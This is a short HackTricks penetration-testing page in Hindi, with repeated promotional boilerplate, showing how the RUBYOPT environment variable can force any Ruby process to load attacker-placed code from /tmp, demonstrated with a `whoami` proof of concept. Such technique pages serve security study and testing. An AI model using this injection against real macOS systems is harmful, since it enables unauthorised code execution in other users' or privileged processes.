macOS Ruby Applications Injection

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs का संग्रह
💬 Discord group में शामिल हों या telegram group में या Twitter पर मुझे 🐦 @carlospolopm का अनुसरण करें.
HackTricks के github repos और HackTricks Cloud में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.

RUBYOPT

इस env वेरिएबल का उपयोग करके जब भी ruby निष्पादित होती है तो उसमें नए पैरामीटर्स जोड़ना संभव है। हालांकि पैरामीटर -e का उपयोग ruby कोड निष्पादित करने के लिए नहीं किया जा सकता, पैरामीटर्स -I और -r का उपयोग करके लाइब्रेरीज के लोड पथ में एक नया फोल्डर जोड़ना और फिर लोड करने के लिए एक लाइब्रेरी निर्दिष्ट करना संभव है।

/tmp में लाइब्रेरी inject.rb बनाएं:

inject.rb

puts `whoami`

कहीं भी एक रूबी स्क्रिप्ट बनाएं जैसे:

hello.rb

puts 'Hello, World!'

फिर एक मनमानी रूबी स्क्रिप्ट बनाएं और इसे लोड करें:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

मजेदार तथ्य, यह पैरामीटर --disable-rubyopt के साथ भी काम करता है:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
💬 Discord group में शामिल हों या telegram group में या Twitter पर मुझे 🐦 @carlospolopm का पालन करें.
HackTricks और HackTricks Cloud github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 3 months ago